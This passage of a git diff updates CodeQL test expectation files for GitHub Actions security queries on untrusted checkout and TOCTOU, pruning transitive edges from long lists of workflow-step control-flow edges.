.github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:27:9:30:6 | Run Step | -| .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | | .github/workflows/test18.yml:19:9:24:6 | Uses Step | .github/workflows/test18.yml:24:9:27:6 | Run Step | -| .github/workflows/test18.yml:19:9:24:6 | Uses Step | .github/workflows/test18.yml:27:9:30:6 | Run Step | -| .github/workflows/test18.yml:19:9:24:6 | Uses Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | | .github/workflows/test18.yml:24:9:27:6 | Run Step | .github/workflows/test18.yml:27:9:30:6 | Run Step | -| .github/workflows/test18.yml:24:9:27:6 | Run Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | | .github/workflows/test18.yml:27:9:30:6 | Run Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:21:9:41:49 | Run Step: check | | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:25:7:31:4 | Uses Step | -| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:31:7:33:4 | Uses Step | -| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | -| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | -| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | -| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | -| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | -| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:31:7:33:4 | Uses Step | -| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | -| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | -| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | -| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | -| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | -| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | -| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | -| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | -| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | -| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | -| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | -| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | -| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | -| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | -| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | -| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | -| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | -| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:40:7:41:4 | Run Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | -| .github/workflows/test20.yml:40:7:41:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | -| .github/workflows/test20.yml:40:7:41:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | -| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | #select diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected index e2c4d9660634..400adb446d26 100644 --- a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected @@ -1,17 +1,12 @@ edges | .github/workflows/actor.yml:17:9:20:6 | Uses Step | .github/workflows/actor.yml:20:9:21:16 | Run Step | | .github/workflows/comment.yml:13:9:28:6 | Uses Step: issue | .github/workflows/comment.yml:28:9:32:6 | Uses Step | -| .github/workflows/comment.yml:13:9:28:6 | Uses Step: issue | .github/workflows/comment.yml:32:9:34:2 | Run Step | | .github/workflows/comment.yml:28:9:32:6 | Uses Step | .github/workflows/comment.yml:32:9:34:2 | Run Step | | .github/workflows/comment.yml:39:9:54:6 | Uses Step: issue | .github/workflows/comment.yml:54:9:58:6 | Uses Step | -| .github/workflows/comment.yml:39:9:54:6 | Uses Step: issue | .github/workflows/comment.yml:58:9:60:2 | Run Step | | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:22:10:27:7 | Uses Step | -| .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | -| .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | | .github/workflows/deployment.yml:22:10:27:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | -| .github/workflows/deployment.yml:22:10:27:7 | Uses Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | | .github/workflows/deployment.yml:27:10:30:7 | Run Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | | .github/workflows/label.yml:13:9:17:6 | Uses Step | .github/workflows/label.yml:17:9:17:41 | Run Step | | .github/workflows/label_actor.yml:13:9:17:6 | Uses Step | .github/workflows/label_actor.yml:17:9:17:41 | Run Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 60f3370f6d17..092a7187951f 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -1,350 +1,145 @@ edges | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | -| .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | -| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | -| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | -| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | -| .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | -| .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | -| .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | -| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:36:9:38:26 | Run Step | | .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning12.yml:36:9:38:26 | Run Step | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:18:9:20:21 | Run Step | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:17:9:18:20 | Run Step | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:15:9:18:6 | Run Step | -| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | | .github/workflows/artifactpoisoning31.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:16:9:20:6 | Uses Step | -| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | | .github/workflows/artifactpoisoning34.yml:16:9:20:6 | Uses Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | | .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | | .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:16:9:18:40 | Run Step | | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | -| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | -| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | -| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | -| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | -| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | -| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | -| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | -| .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | -| .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | | .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | -| .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | | .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | -| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | -| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | -| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | -| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | -| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | -| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | -| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | -| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | -| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | -| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | -| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | -| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | -| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | -| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | -| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | -| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | -| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | -| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | -| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | -| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | -| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | -| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | -| .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | -| .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | -| .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | -| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | -| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | -| .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | -| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | -| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | -| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:31:9:34:6 | Run Step | -| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step | | .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | -| .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | -| .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | .github/workflows/dependabot1.yml:31:9:34:6 | Run Step | -| .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step | | .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | -| .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | .github/workflows/dependabot1.yml:31:9:34:6 | Run Step | -| .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step | | .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | .github/workflows/dependabot1.yml:31:9:34:6 | Run Step | -| .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step | | .github/workflows/dependabot1.yml:31:9:34:6 | Run Step | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step | | .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | .github/workflows/dependabot1.yml:43:9:45:29 | Uses Step | | .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | -| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | -| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | -| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | -| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | -| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | | .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | -| .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | -| .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | -| .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | -| .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | | .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | -| .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | -| .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | -| .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | | .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | -| .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | -| .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | -| .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:18:11:21:8 | Uses Step | -| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | | .github/workflows/gitcheckout.yml:18:11:21:8 | Uses Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | -| .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | | .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | | .github/workflows/issue_comment_heuristic.yml:11:9:24:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_heuristic.yml:24:9:28:6 | Run Step: get-sha | -| .github/workflows/issue_comment_heuristic.yml:11:9:24:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | | .github/workflows/issue_comment_heuristic.yml:24:9:28:6 | Run Step: get-sha | .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | | .github/workflows/issue_comment_heuristic.yml:37:7:48:4 | Run Step: vars | .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | -| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | -| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | -| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | | .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | | .github/workflows/issue_comment_octokit.yml:38:9:52:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_octokit.yml:52:9:57:6 | Run Step: get-sha | -| .github/workflows/issue_comment_octokit.yml:38:9:52:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | | 